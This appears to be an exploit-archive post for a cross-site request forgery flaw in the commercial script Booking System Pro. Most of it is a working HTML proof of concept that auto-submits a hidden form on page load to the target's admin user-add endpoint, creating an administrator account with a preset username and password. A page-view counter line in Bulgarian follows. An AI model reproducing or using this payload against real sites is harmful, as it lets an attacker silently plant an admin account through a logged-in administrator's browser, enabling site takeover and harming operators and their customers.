# Exploit Title: Booking System Pro CSRF Vulnerability # Date: 28/08/2012 # Author: DaOne (@LibyanCA) # Vendor: http://www.neptunescripts.com/products # Price: $39 # CSRF Add Admin <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/admin/users/add"> <input type="hidden" name="data[User][name]" value="webadmin"/> <input type="hidden" name="data[User][username]" value="webadmin"> <input type="hidden" name="data[User][password]" value="pass123"> <input type="hidden" name="data[User][email]" value="admin@email.com"> <input type="hidden" name="data[User][phone]" value=""/> <input type="hidden" name="data[User][role]" value="admin"/> </form> </body> </html>Брой прочитания на тази страница: 1362
Booking System Pro CSRF Vulnerability